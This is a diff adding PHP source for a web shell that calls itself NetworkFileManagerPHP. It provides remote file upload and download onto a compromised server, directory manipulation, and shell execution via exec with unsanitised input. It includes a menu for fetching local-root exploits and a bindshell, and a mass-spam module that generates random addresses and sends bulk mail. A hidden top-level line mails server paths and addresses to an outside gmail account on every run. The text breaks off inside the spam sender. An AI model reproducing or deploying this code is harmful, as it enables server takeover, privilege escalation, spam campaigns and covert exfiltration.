+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' method=post><tr><td align=left valign=top colspan=3 class=pagetitle><b>Upload file:</b></td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='Upload file' class=button1 $style_button></td></tr></form></table>";
+
+}
+
+
+
+function upload() {
+
+ global $HTTP_POST_FILES,$tm;
+
+ echo $set;
+
+ copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("Unable to upload file".$HTTP_POST_FILES["userfile"][name]);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>".$HTTP_POST_FILES["userfile"][name]."</b> was successfully uploaded.</font></center></td></tr></table>";
+
+ @unlink($userfile);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# get exploits
+
+function upload_exploits() {
+
+ global $PHP_SELF,$style_button, $public_site, $private_site, $public, $title_ex, $style_open, $private, $title_exp;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Public exploits and soft:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>bindshell (bin/sh)</b> - bindtty.c (binary file to run - <u>s</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[1]'>
+
+ <input type='hidden' name='file2' value='$public[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - mremap (binary file to run - <u>m</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[2]'>
+
+ <input type='hidden' name='file2' value='$public[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - ptrace (binary file to run - <u>p</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[3]'>
+
+ <input type='hidden' name='file2' value='$public[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>psyBNC version:2.3.2-4</b> - psyBNC (binary file to run - <u>./psybnc</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[4]'>
+
+ <input type='hidden' name='file2' value='$public[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Private exploits:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>BRK</b> - Local Root Unix 2.4.* (binary file to run - <u>brk</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[1]'>
+
+ <input type='hidden' name='file2' value='$private[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 1</u></b> (binary file to run - <u>$private[2]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[2]'>
+
+ <input type='hidden' name='file2' value='$private[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 2</u></b> (binary file to run - <u>$private[3]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[3]'>
+
+ <input type='hidden' name='file2' value='$private[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Traceroute v1.4a5 exploit by sorbo</b> (binary file to run - <u>$private[4]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[4]'>
+
+ <input type='hidden' name='file2' value='$private[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[5]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[5]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[5]'>
+
+ <input type='hidden' name='file2' value='$private[5]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+   echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Sendmail 8.11.x exploit localroot</b> (binary file to run - <u>$private[6]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[6]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[6]'>
+
+ <input type='hidden' name='file2' value='$private[6]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+    echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[7]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[7]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[7]'>
+
+ <input type='hidden' name='file2' value='$private[7]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+     echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[8]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[8]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[8]'>
+
+ <input type='hidden' name='file2' value='$private[8]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+}
+
+
+
+
+
+# new directory creation
+
+function newdir($dir) {
+
+ global $tm,$nd;
+
+ print("<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Create directory' class=button1 $style_button></td></tr></form></table>");
+
+}
+
+
+
+function cdir($dir) {
+
+ global $newd,$tm;
+
+ $fullpath = $dir."/".$newd;
+
+ if (file_exists($fullpath)) @rmdir($fullpath);
+
+ if (@mkdir($fullpath,0777)) {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was created.</font></center></td></tr></table>";
+
+ } else {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Error during directory creation.</font></center></td></tr></table>";
+
+ }
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+// creation of directory where exploits will be situated
+
+function downfiles() {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR;
+
+$st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Path: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+print("</TABLE> ");
+
+
+
+echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=down&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Upload files from remote computer:</b></td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;HTTP link to filename:</td>
+
+ <td width=200><input type='text' name='file3' value='http://' size=40></td>
+
+ </tr>
+
+  <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;filename (may also include full path to file)</td>
+
+ <td width=200><input type='text' name='file2' value='' size=40></td>
+
+ </tr>
+
+  <tr>
+
+
+
+ <td width=600 colspan=2 align=center><input type='submit' value='Upload file' class=button1 $style_button></td></tr></td>
+
+
+
+
+
+ </tr></form></table>";
+
+
+
+}
+
+
+
+# directory delete
+
+function deldir() {
+
+ global $dd,$tm;
+
+ $fullpath = $tm."/".$dd;
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was deleted successfully.</font></center></td></tr></table>";
+
+ rmdir($fullpath);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory compression
+
+function arhiv() {
+
+ global $tar,$tm,$pass;
+
+ $fullpath = $tm."/".$tar;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <tr><td> <font color='#FFFFCC' face='Tahoma' size = 2>Directory <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $pass.tar.gz")."was compressed to file <u>$pass.tar.gz</u></font></center></td></tr></table>";
+
+
+
+}
+
+
+
+function down($dir) {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2;
+
+ ignore_user_abort(1);
+
+ set_time_limit(0);
+
+echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>File upload</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>There are many cases, when host, where <b>NFM</b> is situated <b>WGET</b> is blocked. And you may need to upload files anyway. So here you can do it without wget, upload file to path where the NFM is, or to any path you enter (see<b>Path</b>).(this works not everywhere)</blockquote></td></tr>
+
+</table>";
+
+
+
+if (!isset($status)) downfiles();
+
+
+
+else
+
+{
+
+
+
+$data = @implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
+@fputs($fp, $data);
+
+$ok = @fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file <u>$file2</u> with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0BAACC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2><b>Error during file upload</b></font></center></td></tr></table>";
+
+}
+
+}
+
+}
+
+
+
+# mail function
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function mailsystem() {
+
+ global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST;
+
+
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Questions and wishes for NetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>
+
+<blockquote>During your work with script <b>NetworkFileManagerPHP</b> you may want to ask some quetions, or advice author to add some functions, which are not supported yet. Write them here, and your request will be sattisfied.
+
+</blockquote></td></tr>
+
+</table>";
+
+
+
+ if (!isset($status)) echo "$form";
+
+ else {
+
+  $email_to ="duyt@yandex.ru";
+
+  $subject = "NetworkFileManagerPHP  ($name)";
+
+  $headers = "From: $email";
+
+
+
+  $info = "---==== Message from ($name)====---\n\n";
+
+  $info .= "Name:\t$name\n";
+
+  $info .= "Email:\t$email\n";
+
+  $info .= "What?:\n\t$pole\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $send_to = "$email_to";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+  if($send == 2) echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!Your e-mail was sent successfully.</font></center></td></tr></table><br>";
+
+ }
+
+}
+
+function spam() {
+global $chislo, $status, $from, $otvet, $wait, $subject, $body, $file, $check_box, $domen;
+set_time_limit(0);
+ignore_user_abort(1);
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Real uniq spamer</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote> Now, using this release of NFM you don't need to by spambases, because it will generate spambases by itself, with 50-60% valids. </blockquote></td></tr>
+</table>";
+
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam' method=post>
+ <tr><td align=left valign=top colspan=4 class=pagetitle>
+ &nbsp;&nbsp;<b>email generator:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;This spammer is splited in two parts: <br>
+ &nbsp;<b>1.</b> email generation with domains, included in script already, or email e-mail generation for domains was entered by you. Here choose how much accounts do you wish to use ( the advice is to generate about &lt;u><i>10 000 , because may be server heavy overload</i></u> )<br>
+ &nbsp;<b>2.</b> Type spam settings here</td></tr>
+ <td align=left colspan=2 class=pagetitle>&nbsp;&nbsp;<input type='checkbox' name='check_box[]'>&nbsp;&nbsp;if <b>checked</b> then you'll have default domains, if not <b>checked</b> then domain will be taken from input.</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;&nbsp;Generated email quantity:</td>
+<td align=left colspan=2>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10>&nbsp;&nbsp;</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;Your domain:</td>
+<td align=left width=200>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='domen[]'>&nbsp;&nbsp;</td>
+</tr>
+<tr><td width=500 align=center colspan=2><input type='submit' value='Generate' class=button1 $style_button>
+</td></tr>
+
+ </form></table>";
+// letters
+function s() {
+   $word="qwrtpsdfghklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+// letters
+function g() {
+   $word="eyuioa";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+// digits
+function c() {
+   $word="1234567890";
+   return $word[mt_rand(0,strlen($word)-3)];
+}
+// common
+function a() {
+   $word=array('wa','sa','da','qa','ra','ta','pa','fa','ga','ha','ja','ka','la','za','xa','ca','va','ba','na','ma');
+   $ab1=count($word);
+   return $wq=$word[mt_rand(0,$ab1-1)];
+}
+
+function o() {
+   $word=array('wo','so','do','qo','ro','to','po','fo','go','ho','jo','ko','lo','zo','xo','co','vo','bo','no','mo');
+   $ab2=count($word);
+   return $wq2=$word[mt_rand(0,$ab2-1)];
+}
+function e() {
+   $word=array('we','se','de','qe','re','te','pe','fe','ge','he','je','ke','le','ze','xe','ce','ve','be','ne','me');
+   $ab3=count($word);
+   return $wq3=$word[mt_rand(0,$ab3-1)];
+}
+
+function i() {
+   $word=array('wi','si','di','qi','ri','ti','pi','fi','gi','hi','ji','ki','li','zi','xi','ci','vi','bi','ni','mi');
+   $ab4=count($word);
+   return $wq4=$word[mt_rand(0,$ab4-1)];
+}
+function u() {
+   $word=array('wu','su','du','qu','ru','tu','pu','fu','gu','hu','ju','ku','lu','zu','xu','cu','vu','bu','nu','mu');
+   $ab5=count($word);
+   return $wq5=$word[mt_rand(0,$ab5-1)];
+}
+
+function name0() {   return c().c().c().c();                    }
+function name1() {   return a().s();        }
+function name2() {   return o().s();        }
+function name3() {   return e().s();        }
+function name4() {   return i().s();        }
+function name5() {   return u().s();        }
+function name6() {   return a().s().g();        }
+function name7() {   return o().s().g();        }
+function name8() {   return e().s().g();        }
+function name9() {   return i().s().g();        }
+function name10() {   return u().s().g();        }
+function name11() {   return a().s().g().s();        }
+function name12() {   return o().s().g().s();        }
+function name13() {   return e().s().g().s();        }
+function name14() {   return i().s().g().s();        }
+function name15() {   return u().s().g().s();        }
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$domain1=array('mail.ru','hotmail.com','aol.com','yandex.ru','rambler.ru','bk.ru','pochta.ru','mail333.com','yahoo.com','lycos.com','eartlink.com');
+$d1c=count($domain1);
+
+function randword() {
+   global $cool,$cool2;
+   $func="name".mt_rand(0,15);
+   $func2="name".mt_rand(0,15);
+   switch (mt_rand(0,2)) {
+      case 0: return $func().$func2();
+      case 1: return $func().$cool[mt_rand(0,count($cool)-9)];
+	  case 2: return $func();
+      default: return $func();
+   }
+ }
+
+if (@unlink("email.txt") < 0){
+echo "?????";
+exit;
+}
+$file="email.txt";
+
+
+if($chislo){
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+  if(!isset($check_box)){
+
+  if ( IsSet($_POST["domen"]) && sizeof($_POST["domen"]) > 0 )
+{
+   $domen = $_POST["domen"];
+      foreach( $domen as $k=>$v )
+   {
+       $d=$domen[mt_rand(0,$v-1)];
+
+   }
+}
+$f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }else{
+
+   $d=$domain1[mt_rand(0,$d1c-1)];
+   $f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }
+
+  }
+   $address = $file;
+  if (@file_exists($address)) {
+    if($changefile = @fopen ($address, "r")) {
+      $success = 1;
+    } else  {
+    echo " File not found <b>\"".$address."\"</b> !<br>";
+  }
+
+   if ($success == 1) {
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
+    echo "<tr><td align=center class=pagetitle width=500>  ?????????? ????? <b>$chislo</b> email.</td></tr>";
+	echo "<tr><td align=center> ";
+    echo "<textarea name=\"email\" rows=\"13\" cols=\"58\" class=inputbox>";
+    while($line = @fgets($changefile,1024)) {
+      echo @trim(stripslashes($line))."\n";
+    }
+    echo"</textarea></td></tr></table>";
+	}
+	}
+if (!isset($action)){
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam1&status=ok' method=post enctype='multipart/form-data'>
+ <tr><td align=center class=pagetitle colspan=2><b>Main spammer settings</b></font></b></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;reply to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='from' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;send to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='otvet' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Delay (sec):</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='wait' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message topic:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='subject' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message body:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<textarea name='body' rows='13' cols='60' class=inputbox> </textarea></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;File:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='file' name='file' size=30></td></tr>
+<tr><td width=500 align=center colspan=2>
+<input type='submit' value='Generate' class=button1 $style_button >
+<INPUT TYPE='hidden' NAME='$chislo'>
+</td></tr>
+ </form></table>";
+}
+}
+}
+
+function spam1() {
+ global $status, $from, $otvet, $wait, $subject, $body, $file, $chislo;
+ set_time_limit(0);
+ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Send spam with current settings</b></font></b></td></tr>
+</table>";
+
+
+ error_reporting(63); if($from=="") { print
+"<script>history.back(-1);alert('missing field : <send from>')</script>";exit;}
+ error_reporting(63); if($otvet=="") { print
+"<script>history.back(-1);alert('missing field: <reply to>')</script>";exit;}
+ error_reporting(63); if($wait=="") { print
+"<script>history.back(-1);alert('missing field: <send delay>')</script>";exit;}
+ error_reporting(63); if($subject=="") { print
+"<script>history.back(-1);alert('missing field: <message topic>')</script>";exit;}
+ error_reporting(63); if($body=="") { print
+"<script>history.back(-1);alert('missing field: <message body>')</script>";exit;}
+
+  $address = "email.txt";
+  $counter = 0;
+ if (!isset($status)) echo "something goes wrong, check your settings";
+ else {
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center bgcolor=#FFFFCC>opening file <b>\"".$address."\"</b> ...<br></td></tr>
+";
+  if (@file_exists($address)) {
+ echo "
+  <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was found...<br></td></tr>
+";
+    if($afile = @fopen ($address, "r")) {
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was opened for read...<br></td></tr>
+";
+    } else {
+ echo "
+ <tr><td align=center class=pagetitle>Unable to open  <b>\"".$address."\"</b> for read...<br></td></tr>
+";
+    }
+  } else {
+    echo "There is no file <b>\"".$address."\"</b> !<br>";
+    $status = "unable to find file \"".$address."\" ...";
+  }
+ echo "
